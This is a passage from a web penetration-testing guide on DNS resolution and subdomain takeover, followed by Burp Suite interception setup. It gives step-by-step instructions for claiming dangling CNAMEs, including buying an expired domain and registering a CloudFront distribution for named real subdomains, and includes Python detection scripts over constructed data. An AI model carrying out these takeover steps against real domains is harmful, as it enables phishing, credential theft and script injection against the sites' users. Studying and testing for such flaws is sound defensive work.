The general communication when a user wants to request an application to be displayed in a web browser is as shown in the figure. Specifically, the breakdown is:

1. When a user tries to open an application through a web browser, the communication starts with the user "talking to the DNS resolver": "Hello DNS resolver, please give me the address of test.example.com";

2. Having received the request from the user, the DNS resolver will try to contact the point where example.com is controlled. From here, the DNS resolver will "communicate" with the DNS server of example.com: "Hello, please give me the address of test.example.com";

3. Afterwards, the DNS server of example.com will answer: "Hello, test.example.com turns out to have (for example) a CNAME pointing to prod.another.com, try to contact that one";

4. Upon receiving this information, the DNS resolver will directly communicate with the DNS server of another.com: "Hello, please give me the address of prod.another.com";

5. When prod.another.com does not point anywhere further, the DNS server of another.com will immediately reply: "Hello, the address is at 1.2.3.4";

6. After all this is done, the DNS resolver will finally reply to the user: "Hello user, the IP address is 1.2.3.4";

7. After getting the information that test.example.com is at IP 1.2.3.4, the web browser will immediately visit the 1.2.3.4 server to request content;

8. And finally, the entire flow is closed by the 1.2.3.4 server presenting the content to the user who made the request.

Then why does the DNS resolver answer only with an IP, while the user actually requested a domain name?

The thing to remember is that, specifically, only IP numbering is used to locate or determine the location of an application. However, because we humans find it difficult to remember so many numbers, DNS technology appeared, which can be used to give a "name" to each different IP (or even to the same IP), with the aim of making it easier for humans to remember the "location" of an application (which can then be called by the domain name).

In general situations, the user can simply ask by giving the domain name, and DNS reciprocates with the IP value.


As a quick note, in practice the flow above can stop at number 3 (three), with the note that at point 3 the DNS server immediately responds with an IP address (because no pointing elsewhere is found). On the other hand, this flow can also continue through further CNAMEs until it ends at one point (a CNAME that no longer points to another CNAME).
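
To make the flow above concrete, here is an added example (not code from the book or from Patrik Hudak's post) that replays steps 2 to 6 over a constructed, in-memory zone table instead of real DNS, so it runs offline. The names test.example.com, prod.another.com and the address 1.2.3.4 are the ones used in the text; www.example.com (answered directly at step 3), old.example.com (a CNAME whose target no longer exists, which is exactly the "expired" situation this chapter is about) and loop.example.com are constructed assumptions.

```python
"""Walk a CNAME chain the way the resolver in the flow above does.

Added example, not from the book. ZONES is a constructed stand-in for the
authoritative DNS servers of example.com and another.com.
"""

# Constructed authoritative data: name -> (record type, value).
# A name that is absent from the table stands for NXDOMAIN, i.e. nobody
# answers for it any more (an expired service or domain).
ZONES = {
    "test.example.com": ("CNAME", "prod.another.com"),      # step 3
    "prod.another.com": ("A", "1.2.3.4"),                   # step 5
    "www.example.com": ("A", "10.20.30.40"),                # flow stops at step 3
    "old.example.com": ("CNAME", "expired.another.com"),    # target no longer exists
    "loop.example.com": ("CNAME", "loop.example.com"),      # misconfiguration a resolver must stop on
}

MAX_HOPS = 8  # bound on CNAME hops, as real resolvers apply


def resolve(name, zones=ZONES):
    """Return (chain, address) for `name`.

    `chain` is the list of CNAME targets followed; `address` is the final A
    record, or None when the chain ends at a name with no record (a dangling
    CNAME) or exceeds MAX_HOPS.
    """
    chain = []
    current = name
    for _ in range(MAX_HOPS):
        record = zones.get(current)
        if record is None:
            return chain, None          # NXDOMAIN: nobody answers for this name
        rtype, value = record
        if rtype == "A":
            return chain, value         # steps 5/6: a concrete address
        chain.append(value)             # steps 3/4: follow the CNAME
        current = value
    return chain, None                  # too many hops, give up


def dangling_names(zones=ZONES):
    """Names in the zone whose CNAME chain never reaches an address."""
    return sorted(
        n for n, (rtype, _) in zones.items()
        if rtype == "CNAME" and resolve(n, zones)[1] is None
    )


if __name__ == "__main__":
    for n in ("test.example.com", "www.example.com", "old.example.com"):
        print(n, "->", resolve(n))
    print("dangling:", dangling_names())
```

A zone owner can run the same check against their real zone export: any CNAME whose chain ends in NXDOMAIN is a record that should be removed or re-pointed, because it is the precondition for everything that follows in this chapter.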

After knowing the basic communication that happens, it will be easier to grasp the basic concepts for understanding the existing attack. In practice, sub-domain takeover is generally divided into three (3) identifications, namely:

1. First see whether or not a sub-domain belonging to the target is pointing to an external third-party domain.

In this case, the third party is a domain that can be newly registered through public domain sellers such as cloudkilat, IDwebhost, the webmaster, Qwords, and the like.

Figure 18. Example Pointing to the External Domain

2. Then see the possible use of a third-party content provider such as Amazon Web Services, Microsoft Azure, Heroku, Fastly, and others.

For information, the business model of each content provider is to provide a "place" where any company can put its content in the service referred to without worrying about the infrastructure. This business model is developed further by providing a unique sub-domain to the companies / organizations that want to use the service. A simple example is the sub-domain media.vine.co, which is given the unique sub-domain name vines.s3.amazonaws.com (this unique name can be set individually or automatically by the provider, such as a2.bime.io which points to bimeio.s3-website-us-east-1.amazonaws.com).


It should be noted that services like Amazon and Microsoft Azure can also be used as hosting that is not limited to putting content such as images.

Figure 19 Example Pointing to 3rd Party Content Provider - https://hackerone.com/reports/121461

3. Second-order sub-domain.

In this case, a second-order sub-domain means the use of third-party content in an application (it can be a sub-domain of the primary domain, or another domain whose script is pulled in) that has not been managed well (generally associated with broken-link hijacking). In practice, its point of execution is not very different from the descriptions at number 1 and number 2; however, identification must be done by visiting the website in question and seeing the "traffic" that drives it.

Figure 20 Sample Identification of Second-Order Sub-Domain


6.3. Impact of Sub-Domain Takeover

The directly visible impact of this attack is that an attacker can pretend to be part of the management system, which can be used to take the valid credentials belonging to the original user.

For example, an attacker has taken over a sub-domain belonging to XYZ. In this situation, the attacker continues the scenario by creating a fake page that aims to take the login data belonging to users / customers of company XYZ. Given that what the user / customer sees is the original domain of company XYZ, this attack can of course have a fairly high success rate.

In another scenario, the attacker can exploit it to execute attacks such as CSRF (Cross Site Request Forgery), which will be discussed in another section of this guide.

6.4. Execution Steps of Sub-Domain Takeover

After seeing the kinds of sub-domain takeover, on this occasion the discussion will be narrowed down to the execution of each kind.

In general, information about the state of a sub-domain can be obtained using the tool called "dig", which is built into almost every Linux operating system and OS X. As a simple example, the following is the result of executing dig against a Nokia sub-domain at nstring2qa.nokia.com.

# dig nstring2qa.nokia.com

Figure 21 Output of "dig" to the sub-domain nstring2qa.nokia.com


In this situation, when a sub-domain has been handed over to a third-party service, there will be information about it, one of which is in the CNAME. From the picture, it appears that the sub-domain nstring2qa.nokia.com has in fact been handed over to api.nstringcms.com.

The simple question then is: what if there are so many sub-domains whose situation should be "seen"? It is certainly not feasible for a tester to execute the "dig" command one by one for each existing sub-domain.

To answer this question, the tester can use the "xargs" command, which is generally used to read a stream of data from an input and then execute a given command on it step by step.

For example, at one time, a tester obtained about 100 (one hundred) sub-domains belonging to target-utama.com. However, given that it is not feasible to type the "dig" command one by one, the tester also has to automate the execution of dig, one way being the "xargs" command.

What needs to be done first is that the tester must enter the list of sub-domains whose "condition" is to be checked with dig into a file. In this situation, the list of sub-domains is entered into a file named "list_of_sub-domain.txt" (without http:// or https://).

# cat list_of_sub-domain.txt | xargs -n1 dig > output_from_dig.txt

Information:

• "cat" is a command to read a file. In this situation, the file read is "list_of_sub-domain.txt";

• Each line read is immediately "thrown" into dig, and this is repeated (automated) by the command xargs -n1;

• Once completed, all results are written into "output_from_dig.txt".

When the execution has completed, proceed to pull out the desired information with the "grep" command from the existing output. In this case, the example of what to "grep" is CNAME.

# cat output_from_dig.txt | grep CNAME > cname_output.txt

Information:

• The file named "output_from_dig.txt" is read, again with "cat";

• Then the information is pulled automatically from every "dig" result that has a CNAME;

• After completion, the entire output is "written" automatically into "cname_output.txt".

Figure 22 Example of output when Viewed cname_output.txt

6.4.1. Execution of the External Pointing (TLD External Name) - Nokia Case

Once information such as the CNAME has been obtained, the easiest thing is to look at CNAMEs that point to external domains. One example is the following Nokia case.

In this situation, it was found that the domain nstring2qa.nokia.com had in fact been pointing to an external domain, api.nstringcms.com.

Figure 23: List of CNAME Output
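
The "cat | xargs -n1 dig" and "grep CNAME" pipeline above, and the instruction in this section to look first at CNAMEs that leave the target's own domain, can be done in one pass once the dig output has been saved. The following is an added example (not the book's code): it parses saved dig answer lines, extracts the CNAME records, and separates those that stay inside the organisation's own domain from those that point to an external domain. The dig output is constructed; only the nstring2qa.nokia.com -> api.nstringcms.com record is the one the book itself shows, and edge.cdn-provider.example, portal.nokia.com and the IP addresses are made up. The apex() helper assumes a two-label registrable domain, which is an approximation.

```python
"""Pull CNAME records out of saved dig output and group them by where they point.

Added example, not code from the book. SAMPLE_DIG_OUTPUT is a constructed
excerpt of concatenated `dig` output; only the nstring2qa.nokia.com record
matches what the book shows.
"""
import re

SAMPLE_DIG_OUTPUT = """\
;; ANSWER SECTION:
nstring2qa.nokia.com.   300   IN  CNAME  api.nstringcms.com.
api.nstringcms.com.     300   IN  A      198.51.100.7

;; ANSWER SECTION:
www.nokia.com.          60    IN  CNAME  edge.cdn-provider.example.
edge.cdn-provider.example. 60 IN  A      198.51.100.8

;; ANSWER SECTION:
intranet.nokia.com.     3600  IN  CNAME  portal.nokia.com.
portal.nokia.com.       3600  IN  A      203.0.113.9
"""

# One dig answer line: owner, TTL, class, type, rdata; tabs or spaces between fields.
ANSWER_RE = re.compile(r"^(\S+)\s+(\d+)\s+IN\s+(\S+)\s+(\S+)$")


def parse_cnames(dig_text):
    """Return [(owner, target)] for every CNAME answer line, trailing dots removed."""
    cnames = []
    for line in dig_text.splitlines():
        line = line.strip()
        if not line or line.startswith(";"):
            continue  # blank lines, comments and section headers
        m = ANSWER_RE.match(line)
        if m and m.group(3) == "CNAME":
            cnames.append((m.group(1).rstrip("."), m.group(4).rstrip(".")))
    return cnames


def apex(name):
    """Approximate the registrable domain as the last two labels.

    Assumption: adequate for .com/.net style names; multi-label suffixes such
    as co.uk need a public-suffix list, which this example does not include.
    """
    return ".".join(name.lower().split(".")[-2:])


def classify(cnames, own_apexes):
    """Split CNAMEs into {"internal": [...], "external": [...]} by target apex.

    A target whose apex is in own_apexes stays under the organisation's own
    control; anything else is a dependency on a third party and is the first
    thing to check for expiry or an unclaimed service.
    """
    own = {a.lower() for a in own_apexes}
    result = {"internal": [], "external": []}
    for owner, target in cnames:
        key = "internal" if apex(target) in own else "external"
        result[key].append((owner, target))
    return result


if __name__ == "__main__":
    records = parse_cnames(SAMPLE_DIG_OUTPUT)
    for bucket, entries in classify(records, ["nokia.com"]).items():
        print(bucket)
        for owner, target in entries:
            print(f"  {owner} -> {target}")
```

Run against a real output_from_dig.txt, the "external" list is the same set that grep CNAME produces, minus the records that merely point within the organisation's own zone, which cannot be taken over by an outsider and only add noise.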


Figure 24 Dig Result to nstring2qa.nokia.com

When a check is performed against the domain nstringcms.com, it turns out that this domain is "available" for purchase by other parties:

Figure 25 Domain is Available I

Figure 26 Domain is Available II


When this domain is purchased and arranged so that it is live, then automatically, when a user accesses nstring2qa.nokia.com, what opens is the api.nstringcms.com page that has been prepared.

6.4.2. Execution of the External Pointing (Third Party Content Provider)

When the target's CNAME turns out to point to external services such as Amazon Web Services or Microsoft Azure, the search can be narrowed to the domains used by such services. Here are a few types of services that have been mapped by a researcher named Michael Henriksen as possibly having this issue:

• Amazon S3 (cloud storage)

• Campaign Monitor (email marketing)

• Cargo (Web publishing platform)

• Cloudfront (Content Delivery Network)

• Desk (Customer service and helpdesk ticket software)

• Fastly (Content Delivery Network)

• FeedPress (Feed analytics and Podcast hosting)

• Freshdesk (Customer support software and ticketing system)

• Ghost (Publishing platform)

• GitHub Pages (GitHub static website hosting)

• Help Scout (Customer service software and education platform)

• Helpjuice (Knowledge base software)

• Heroku (Cloud application platform)

• Instapage (Landing page platform)

• Pingdom (Website and performance monitoring)

• Shopify (Ecommerce platform)

• StatusPage (Status page hosting)

• SurveyGizmo (Online survey software)

• Teamwork (Project management, help desk and chat software)

• Tictail (Social shopping platform)

• Tumblr (Microblogging and social networking platform)

• Unbounce (Landing page builder and conversion marketing platform)

• UserVoice (Product management software)

• WPEngine (WordPress blog hosting)

• Zendesk (Customer service software and support ticket system)


When it is found that the pointing to a third-party content provider has not been set up properly, an error display will appear, which of course varies. On this occasion, one of the findings of the noobsec team against one of the sub-domains belonging to YCombinator will be presented. One of the sub-domains, located at jobs.ycombinator.com, turned out to be pointing to a CloudFront distribution that had not been set up properly.

Figure 27 Cloudfront unregulated

What needs to be done when such an error display is found (it will of course differ between services) is to try to "claim" the existing service. Given that CloudFront is part of Amazon (for its content delivery network service), one can enter the CloudFront Dashboard to create a new "distribution".

Figure 28 CloudFront Distributions - Create

Afterwards, select "Get Started" in the "Web" section to start the setup.

Figure 29 "Get Started" with CloudFront Distributions section "Web"


In the settings, select "set origin" to add a "bucket" owned by the account. If there is no bucket yet, one can try to create ("create") one and upload ("upload") a simple .html file as the main page. Here is an example of the settings:

Figure 30 Origin Settings

Once that is set up, enter jobs.ycombinator.com in the CNAME field of the "Distribution Settings", followed by selecting "create" and saving.

Figure 31 Entering jobs.ycombinator.com into the CNAME

Figure 32 Configuration has been Saved

When everything has been arranged in accordance with the existing settings, then when a user accesses the page "jobs.ycombinator.com", the user will automatically see the .html file page that was inserted at the beginning.


Here is one example of how it looks:

Figure 33 Sub-Domain Takeover - Proof of Concept

Some other examples that can be used as references for similar issues are as follows:

• https://www.we45.com/blog/how-an-unclaimed-aws-s3-bucket-escalates-to-subdomain-takeover : sub-domain takeover via an AWS S3 bucket that has not been claimed;

• https://blog.securitybreached.org/2018/09/24/subdomain-takeover-via-unsecured-s3-bucket/ : sub-domain takeover via an AWS S3 bucket that has not been claimed;

• https://0xpatrik.com/subdomain-takeover-starbucks/ : sub-domain takeover on Microsoft Azure services that have not been set up properly;

• https://0xpatrik.com/takeover-proofs/ : sub-domain takeover on several services such as Github, Amazon S3, Heroku, and Readme.io;

• https://hackernoon.com/subdomain-takeover-of-blog-snapchat-com-60860de02fe7 : sub-domain takeover on the Tumblr service.

6.4.3. Execution of the Second Order Domain

This section is actually not much different from the two sections described previously. On this occasion, the difference is when, in the traffic, the use of other third-party services is found to be part of the content (not necessarily a sub-domain of the primary domain).

For example, when trying to open the site example.com, it turns out there is a sub-domain subdomain.example.com that is "called" by the intended application.

Figure 34 Sub-domains belonging to Example.com


When traced, the sub-domain subdomain.example.com turns out to point to a third-party service (an external domain or content provider) that is not configured properly (or not claimed), so taking over this sub-domain follows the two previous explanations.

Note that in practice the resource is not always a sub-domain of the primary domain; it may be content pulled from an entirely different domain, for instance example.com loading content from pihak-ketiga.com.

The worst case is when the content pulled in by the primary domain is (but is not limited to) JavaScript, as shown in the previous image. In that situation an attacker who can claim the sub-domain in question (if it is indeed dangling) can serve malicious JavaScript in its place; that script runs in the context of the primary domain and can be used for various purposes such as stealing cookies, forcing users to download malware, and so on.

Figure 35 Second Order Sub-Domain - https://0xpatrik.com/second-order-bugs/

In practice there are many ways to determine the "contents" of a page, such as the browser's "developer tools" (for example in Firefox) or a traffic interceptor such as Burp Suite.
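To make the two checks above concrete (which hosts a page pulls content from, and whether a host's CNAME points at an unclaimed service), here is an added Python example. It is not code from this guide or from any of the write-ups cited; the HTML, the CNAME answers and the HTTP bodies are constructed, and the three service fingerprints are examples of the kind of marker a tester compares against, not a complete list. In real use the observations come from dig and curl against each host found.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Service fingerprints: the CNAME suffix a dangling record points at and the
# text that service returns for an unclaimed name. These three are widely
# published takeover fingerprints; treat them as examples, not a complete list.
FINGERPRINTS = {
    "github.io": "There isn't a GitHub Pages site here",
    "s3.amazonaws.com": "NoSuchBucket",
    "herokuapp.com": "No such app",
}


class _ResourceCollector(HTMLParser):
    """Collects the URLs of scripts, stylesheets, iframes and images in a page."""

    def __init__(self):
        super().__init__()
        self.urls = []

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "script" and attrs.get("src"):
            self.urls.append(attrs["src"])
        elif tag == "link" and attrs.get("href"):
            self.urls.append(attrs["href"])
        elif tag in ("iframe", "img") and attrs.get("src"):
            self.urls.append(attrs["src"])


def third_party_hosts(html, primary_domain):
    """Return (sub-domains of primary_domain, external hosts) that the page
    loads content from. Both lists are candidates for a dangling-DNS check."""
    collector = _ResourceCollector()
    collector.feed(html)
    subdomains, external = set(), set()
    for url in collector.urls:
        host = urlparse(url).hostname
        if not host:
            continue  # relative URL: served by the primary domain itself
        if host.endswith("." + primary_domain):
            subdomains.add(host)
        elif host != primary_domain:
            external.add(host)
    return sorted(subdomains), sorted(external)


def classify_dangling(cname, body):
    """Match a host's CNAME target and HTTP body against the fingerprints.
    Returns the matched service suffix, or None when nothing looks unclaimed."""
    if cname is None:
        return None
    for suffix, marker in FINGERPRINTS.items():
        if cname.rstrip(".").endswith(suffix) and marker in body:
            return suffix
    return None


def report(html, primary_domain, observations):
    """Map each host the page depends on to the unclaimed service it points at."""
    subs, ext = third_party_hosts(html, primary_domain)
    findings = {}
    for host in subs + ext:
        cname, body = observations.get(host, (None, ""))
        service = classify_dangling(cname, body)
        if service:
            findings[host] = service
    return findings


# Constructed page for example.com; not fetched from a real site.
SAMPLE_HTML = """<html><head>
<link rel="stylesheet" href="https://static.example.com/site.css">
<script src="/js/local.js"></script>
<script src="https://cdn.pihak-ketiga.com/tracker.js"></script>
<script src="//assets.example.com/app.js"></script>
</head><body><img src="https://img.example.com/logo.png"></body></html>"""

# Constructed DNS/HTTP observations (what dig and curl would return per host).
SAMPLE_OBSERVATIONS = {
    "assets.example.com": ("example-assets.github.io.", "There isn't a GitHub Pages site here."),
    "static.example.com": ("d111111abcdef8.cloudfront.net.", "<html>ok</html>"),
    "img.example.com": (None, "<html>ok</html>"),
    "cdn.pihak-ketiga.com": ("cdn-pihak-ketiga.s3.amazonaws.com.", "<Code>NoSuchBucket</Code>"),
}

if __name__ == "__main__":
    for host, service in report(SAMPLE_HTML, "example.com", SAMPLE_OBSERVATIONS).items():
        print(f"{host}: CNAME to unclaimed {service} resource, candidate for takeover")
```

The second-order point is visible in the sample: cdn.pihak-ketiga.com is not a sub-domain of example.com at all, yet because example.com loads a script from it, claiming that bucket would put attacker JavaScript into example.com's pages.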

6.5. Sub-Domain Takeover References

Given that the discussion on this subject is quite extensive (and not limited to CNAME records), this guide also summarizes (from the previous exposition) and includes


several other references that can be used to identify sub-domain takeover vulnerabilities. Some of the references that can be consulted are:

• Guide to Subdomain Takeovers: https://www.hackerone.com/blog/Guide-Subdomain-Takeovers

• Subdomain Takeover Basics: https://0xpatrik.com/subdomain-takeover-basics/

• Broken Link Hijacking: https://edoverflow.com/2017/broken-link-hijacking/

• Subdomain Takeover Proofs (GitHub, Amazon S3, Heroku, and Readme.io): https://0xpatrik.com/takeover-proofs/

• Subdomain Takeover Principles: https://blog.sweepatic.com/subdomain-takeover-principles/

• Subdomain Takeover at Starbucks (via Microsoft Azure): https://0xpatrik.com/subdomain-takeover-starbucks/

• Subdomain Takeover Detection with Aquatone: https://michenriksen.com/blog/subdomain-takeover-detection-with-aquatone/

• Hostile Subdomain Takeover using Heroku, GitHub, and more: https://labs.detectify.com/2014/10/21/hostile-subdomain-takeover-using-herokugithubdesk-more/

• Subdomain Takeover on Jobsycombinator: https://noobsec.org/project/2018-11-06-subdomain-takeover-on-jobsycombinator/

• How an Unclaimed AWS S3 Bucket Escalates to Subdomain Takeover: https://www.we45.com/blog/how-an-unclaimed-aws-s3-bucket-escalates-to-subdomain-takeover

• Subdomain Takeover via Unsecured S3 Bucket: https://blog.securitybreached.org/2018/09/24/subdomain-takeover-via-unsecured-s3-bucket/

• Subdomain Takeover of blog.snapchat.com (via Tumblr): https://hackernoon.com/subdomain-takeover-of-blog-snapchat-com-60860de02fe7


7. WEB APPLICATION TRAFFIC INTERCEPTOR & FORWARDER TOOLS

It is inevitable that one of the biggest things a tester has to "face" when wanting to "play" with a web-based application is a tool that can intercept and forward the data traffic of the application (both the requests and the responses).

Many such tools are in circulation, both free and paid. OWASP ZAP and Burp Suite are two of the best known among testers.

To keep the discussion focused, this guide refers to Burp Suite as the interceptor and forwarder tool.

7.1. Why a Traffic Interceptor and Forwarder Is Needed

This section can open with a short question: "How does one determine how an application works from the front-end perspective (or rather, from the user's point of view)?"

When a user opens an application and uses its features, that user can only see the flow with the naked eye. For example, in an application that can be used to buy prepaid phone credit (pulsa), the flow commonly seen is:

Login to Application → Select the Purchase Credit Menu → Select the credit value to be bought → Confirm the value to be bought

Figure 36 Common Flow of a Credit Purchase up to Confirmation

But for testing, such a short flow is of course not enough to support the testing of a system. Equipped with a tool that can intercept and forward traffic, the test steps become far more thorough and in-depth.

Here is an overview of the flow a tester sees when dealing with an application with the same features as noted above:


Login to Application (username and password) → see the delivery flow; obtain session → see how the session is formed; Select the Purchase Credit Menu → see the action performed when the menu is selected; Select the credit value to be bought → view the ID or identity of the selected credit value; Confirm the value to be bought → view the ID or identity of the voucher value and the action performed when confirmation is done

Figure 37 Common Flow of a Credit Purchase up to Confirmation - with a Traffic Interceptor

As a brief general description of this chart:

• Login to Application

As usual, when a user logs in to the application with valid credentials, the user is taken directly to their own dashboard. A tester, however, needs to see the flow that runs when the credentials are sent from the user to the server, so that potential vulnerabilities there, such as SQL Injection and others, can be examined.

• Obtaining a Session

The session is of great interest to testers, because there is potential to jump into another user's account without having to know the username and/or password used. Therefore, understanding the flow by which a session is established once a user has logged in is very necessary for studying the application flow further.

• Choosing the Purchase Credit Menu

At first glance there appears to be no problem here. In reality, the tester needs the flow that occurs when a menu is selected. The simple purpose is to look for hidden menus (for example, menus that were apparently intended only for the application owner's internal staff), for menu parameters that can be injected, and so on.


• Choosing the Credit Value to Be Purchased

It is not impossible that during a credit purchase there is a flaw in the application code that allows a user to buy a high credit value while paying a lower amount. To determine this potential, the tester also needs the flow of the credit value selection process, continued up to the purchase stage.

• And of course there are many more things that can be seen from this simple flow alone.

Thus, a tool that can intercept and forward application traffic is something that is hard to separate from a tester. For this reason the guide also includes it as one of the things a tester should know.

7.2. Installing the JRE and Running Burp Suite

Burp Suite is an interceptor and forwarder for web application traffic developed by PortSwigger Web Security. At the time of writing it comes in three versions: community (free), professional (paid), and enterprise. The good thing is that a tester is not required to use a paid version to be able to test or analyze the data traffic of an application.

The community version of Burp Suite can be downloaded from PortSwigger's official portal at https://portswigger.net/burp/communitydownload . There, several options are offered, such as installers prepared for each operating system (such as .exe or .dmg) or a .jar (Java Archive) download.

Figure 38 Burp Suite Community Edition


To keep the execution uniform, this guide uses the .jar format of Burp Suite.

When the .jar version has been downloaded, the tester must make sure the JRE (Java Runtime Environment) is installed on their operating system. The easiest way to check is by typing the command "java" at the command prompt (on Windows) or terminal (on OS X or Linux). If it is not installed, the tester should download it first.

Given that the download link changes for each version, the tester can simply enter the keyword "Download JRE" in Google to find the link.

Figure 39 JRE Download - Keyword on Google

After that, the tester is taken to the JRE download page on Oracle's official portal. The page will of course vary depending on the latest JRE version at the time the tester downloads it.

Figure 40 JRE Download Page on Oracle's Official Portal


Here the tester only needs to choose the download matching the operating system used and its architecture (for example, 32-bit or 64-bit).

Once the download is finished, install the JRE and try typing the command "java" (lowercase) at the command prompt or terminal. When it has been installed properly, the JRE's own "help" output is shown automatically.

Figure 41 Display after the JRE has been installed

When all goes well, go to the download directory where Burp Suite is located. Then continue by typing "java -jar burp_suite_file_name.jar" (with the actual name of the downloaded file) as in the following example:

Figure 42 Burp Suite Running


Is there a simpler way to launch Burp Suite? Of course. The tester just needs to double-click the downloaded .jar file and Burp Suite will run.

When Burp Suite is open, the tester is confronted with a view that is quite dense (at first sight).

Figure 43 Burp Suite Running

As a side note, since this guide does not discuss the use of Burp Suite in depth, the discussion is limited to intercepting and forwarding the data traffic of an application.

7.3. Intercepting Web Application Traffic - HTTP

The next thing to do is open the "Proxy" tab (the second tab from the top left) and turn the intercept mode off first. When it is off, it looks like this:

Figure 44 Intercept Mode Turned Off


Continue by choosing the "Options" sub-tab under "Proxy".

Here the tester sees the "Proxy Listeners" that act as the intermediary for intercepting and forwarding traffic.

Figure 45 "Proxy Listeners" Menu

Since the traffic of an application accessed through a web browser is to be intercepted, direct that traffic to the interface 127.0.0.1, port 8080 (used as the default by Burp Suite, as shown in the picture). Then set the browser's proxy to point at that address and port.

To keep things uniform, this guide discusses the proxy settings in Mozilla's browser, Firefox.

In Firefox, go to "Preferences" and type "proxy". Then choose "Settings", "Manual proxy configuration", and check "Use this proxy server for all protocols".

Figure 46 "Preferences" and "Settings" Menu


Figure 47 Proxy Settings

Then select "OK" and try to open a portal over plain HTTP (without the "S"). As an example, the portal opened here is http://testphp.vulnweb.com .

When it has opened successfully, the traffic is automatically "caught" by Burp Suite as in the following picture:

Figure 48 Catching Data Traffic via Burp Suite

So what if one wants to open a portal that uses HTTPS? A few additional steps are needed, because if only the steps described so far are done, the browser displays an error.


Figure 49 Connection Failed

7.4. Intercepting Web Application Traffic - HTTPS

The main reason a web application that uses HTTPS produces a failure message when intercepted with Burp Suite is that, fundamentally, Burp Suite presents its own certificate.

"By default, when you browse an HTTPS website via Burp, the Proxy generates an SSL certificate for each host, signed by its own Certificate Authority (CA) certificate. This CA certificate is generated the first time Burp is run, and stored locally." - PortSwigger

So when the browser receives a certificate issued by Burp's CA instead of the valid certificate the site normally presents (for example Google's certificate issued by GlobalSign), it raises an error, because from the browser's point of view the user is being "attacked": Burp is, after all, acting as a man-in-the-middle here.

To deal with this, the tester needs to install Burp Suite's CA certificate as a "trusted root" in the browser being used (or at the operating system level when using Microsoft Edge or Google Chrome).

The starting point is to visit the link http://burp with nothing added after it.

Figure 50 Accessing http://burp


Continue by downloading Burp Suite's certificate through the "CA Certificate" option in the upper right.

Figure 51 Download CA Certificate

Afterwards, "import" this certificate into the browser by going to "Preferences" and typing "cert".

Figure 52 "Certificates" Menu in Firefox

Then go to "View Certificates" and, on the "Authorities" tab, select the "Import" button. Then select the cacert.der that was downloaded from the http://burp page.

Figure 53 Importing Burp Suite's Certificate into the Browser


Next, check the two trust options and select "OK" to finish.

Figure 54 Trusting the Certificate in the Browser

If the entire configuration is correct, there should be an entry named "PortSwigger" under the "Authorities" tab in the "Certificate Name" column.

Figure 55 "View Certificates" in the Browser

When finished, continue by opening https://google.com and looking at the "Intercept" sub-tab under "Proxy" in Burp Suite. If the request has been intercepted, all these steps have succeeded.

Figure 56 Opening Google with Burp Suite's Certificate


Figure 57 HTTPS Traffic Successfully Intercepted
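For a scripted client (a Python tool instead of Firefox) the equivalent of the browser steps in this section is to fetch Burp's CA and hand it to the client as its trust anchor. The following Python example is added here and is not part of this guide or of Burp Suite; it assumes Burp's default listener at 127.0.0.1:8080 and that the CA is downloadable at http://burp/cert (PortSwigger's documented location, but verify it against your version). Without the cafile the HTTPS request fails in the same way Figure 49 does.

```python
import base64
import ssl
import urllib.request

BURP_PROXY = "http://127.0.0.1:8080"  # Burp's default listener (Figure 45)
BURP_CERT_URL = "http://burp/cert"    # assumed: where Burp serves its CA in DER form


def der_to_pem(der_bytes):
    """Re-encode a DER certificate (the content of Burp's cacert.der) as PEM,
    the form most command-line clients accept for --cacert / cafile."""
    b64 = base64.b64encode(der_bytes).decode("ascii")
    lines = [b64[i:i + 64] for i in range(0, len(b64), 64)]
    return ("-----BEGIN CERTIFICATE-----\n" + "\n".join(lines) +
            "\n-----END CERTIFICATE-----\n")


def fetch_burp_ca(proxy=BURP_PROXY, cert_url=BURP_CERT_URL):
    """Download Burp's CA certificate through the proxy itself: the http://burp
    page only exists for requests that pass through Burp."""
    opener = urllib.request.build_opener(urllib.request.ProxyHandler({"http": proxy}))
    with opener.open(cert_url, timeout=10) as resp:
        return resp.read()


def proxy_opener(ca_pem_path, proxy=BURP_PROXY):
    """Client that sends HTTP and HTTPS via Burp and, unlike the system trust
    store, accepts Burp's per-host certificates because Burp's CA is loaded.
    Leaving out cafile reproduces the Figure 49 failure for this client."""
    ctx = ssl.create_default_context(cafile=ca_pem_path)
    return urllib.request.build_opener(
        urllib.request.ProxyHandler({"http": proxy, "https": proxy}),
        urllib.request.HTTPSHandler(context=ctx),
    )


def verification_failed(exc):
    """True when an exception (possibly a URLError wrapping the real cause) is
    the certificate-trust error raised against an untrusted intercepting CA."""
    seen = 0
    while exc is not None and seen < 5:
        if isinstance(exc, ssl.SSLCertVerificationError):
            return True
        reason = getattr(exc, "reason", None)
        exc = reason if isinstance(reason, BaseException) else (exc.__cause__ or exc.__context__)
        seen += 1
    return False


if __name__ == "__main__":
    der = fetch_burp_ca()
    with open("burp-ca.pem", "w") as fh:
        fh.write(der_to_pem(der))
    try:
        with proxy_opener("burp-ca.pem").open("https://google.com", timeout=10) as resp:
            print("intercepted via Burp, status", resp.status)
    except Exception as exc:
        print("TLS trust problem:" if verification_failed(exc) else "request failed:", exc)
```

Keep burp-ca.pem out of any trust store you use for real browsing: anyone holding the matching private key (here, the Burp installation) can impersonate every HTTPS site to a client that trusts it, which is precisely why the browser complained in the first place.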

7.5. References for Installing Burp Suite's CA in Various Browsers

Here are a few references that complement the explanation above:

• Installing Burp's CA certificate: https://portswigger.net/burp/documentation/desktop/tools/proxy/options/installing-ca-certificate

• Installing Burp's CA Certificate in Firefox: https://support.portswigger.net/customer/portal/articles/1783087-installing-burp-s-ca-certificate-in-firefox

• Installing Burp's CA Certificate in Chrome: https://support.portswigger.net/customer/portal/articles/1783085-installing-burp-s-ca-certificate-in-chrome

• Installing Burp's CA Certificate in Chrome on Linux: https://support.portswigger.net/customer/portal/articles/2956765-installing-burp-s-ca-certificate-in-chrome-on-linux


8. BASIC CONCEPTS OF THE HTTP GET AND POST METHODS

Before proceeding further, it is good for testers to understand the basic concepts of the HTTP GET and HTTP POST methods.

The most basic thing one encounters when entering data into a form in an application is that the data either appears in the URL (the link changes along with the entered data) or does not appear in the URL at all. Both are normal and are not a big problem by themselves.

They are still discussed here because the distinction comes up quite often in this guide.

When a link is dynamic (changes according to the entered data), it can be concluded that the request uses the GET method. The simplest and most frequently encountered example is entering a word in a search feature.

Figure 58 Sample of the GET Method

In the picture above, the user has entered the words "Insecure Direct Object Reference" in the search feature, and the words are reflected in the URL, so the URL changes. This condition indicates the GET method, because the URL changes according to the user input.

